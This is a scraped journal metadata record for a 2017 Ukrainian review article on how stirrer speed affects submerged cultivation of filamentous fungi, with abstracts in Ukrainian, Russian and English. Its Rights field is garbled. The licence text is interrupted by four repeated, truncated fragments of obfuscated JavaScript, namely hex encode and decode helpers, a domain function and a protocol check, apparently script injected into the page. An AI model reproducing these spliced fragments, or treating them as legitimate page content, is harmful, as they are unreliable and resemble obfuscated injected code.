Запис Детальніше

Аналіз впливу механічного перемішування на ефективність культивування мікроскопічних міцеліальних грибів

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title Аналіз впливу механічного перемішування на ефективність культивування мікроскопічних міцеліальних грибів
Анализ влияния механического перемешивания на эффективность культивирования микроскопических мицелиальных грибов
EVALUATION OF MECHANICAL AGITATION EFFECT ON MICROSCOPIC FILAMENTOUS FUNGI CULTURING EFFICACY
 
Creator Motronenko, Valentyna; Національний технічний університет України "Київський політехнічний інститут"
Ruzhynska, Luidmyla; Національний технічний університет України "Київський політехнічний інститут"
Chumak, Vitalii; Національний авіаційний університет
Galkin, Oleksandr; Національний технічний університет України "Київський політехнічний інститут"
 
Subject
глибинне культивування; інтенсивність перемішування; механічне перемішування; міцеліальні гриби; морфологічна будова
663.11+58.039

глубинное культивирование; интенсивность перемешивания; механическое перемешивание; мицелиальные грибы; морфологическое строение
663.11+58.039

submerged cultivation; agitation intensity; mechanical agitation; filamentous fungi; morphological structure
663.11+58.039
 
Description Мета: За існуючими літературними даними провести порівняльний аналіз впливу режимів перемішування на життєздатність та продуктивність міцеліальних грибів при глибинному культивуванні. А також підібрати режим культивування при якому вихід кінцевого продукту буде максимальним. Методи: У розглянутих статтях проводили дослідження режимів перемішування в лабораторних ферментерах з механічними перемішуючими пристроями. Досліди проводили для обраного типу мішалки, змінюючи частоту обертання перемішуючого пристрою в апараті. Результати: З проведеного аналізу видно, що важливу роль при глибинному культивуванні відіграє інтенсивність механічного перемішування. В середньому, кількість обертів мішалки становить 120-   180 об/хв.
Цель: За существующими литературными данными провести сравнительный анализ влияния режимов перемешивания на жизнеспособность и производительность мицелиальных грибов при глубинном культивировании. А также подобрать режим культивирования при котором выход конечного продукта будет максимальным. Методы: В рассмотренных статьях проводили исследования режимов перемешивания в лабораторных ферментерах с механическими перемешивающими устройствами. Опыты проводили для выбранного типа мешалки, изменяя частоту вращения перемешивающего устройства в аппарате. Результаты: С проведенного анализа видно, что важную роль при глубинном культивировании, важная роль принадлежит  интенсивности механического перемешивания. В среднем, количество оборотов мешалки составляет 120-180 об/мин.
Goal: Comparative evaluation of the effect of agitation modes on viability and productivity of filamentous fungi in submerged cultivation conditions using the existing literature data. Selection of culturing mode providing the maximum end product yield. Methods: Investigation of agitation modes in laboratory fermenters with mechanical agitation devices was performed in the articles reviewed. The experiments were carried out for the selected agitator type by variation of agitation device rotation frequency in the apparatus. Results: As can be seen from the evaluation performed, mechanical agitation intensity plays an important role in submerged cultivation. The average stirrer rotation rate is 120-180 rpm.
 
Publisher National Aviation University
 
Contributor


 
Date 2017-07-17
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/11754
10.18372/2306-1472.71.11754
 
Source Proceedings of the National Aviation University; Том 71, № 2 (2017); 108-114
Вестник Национального авиационного университета; Том 71, № 2 (2017); 108-114
Вісник Національного Авіаційного Університету; Том 71, № 2 (2017); 108-114
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e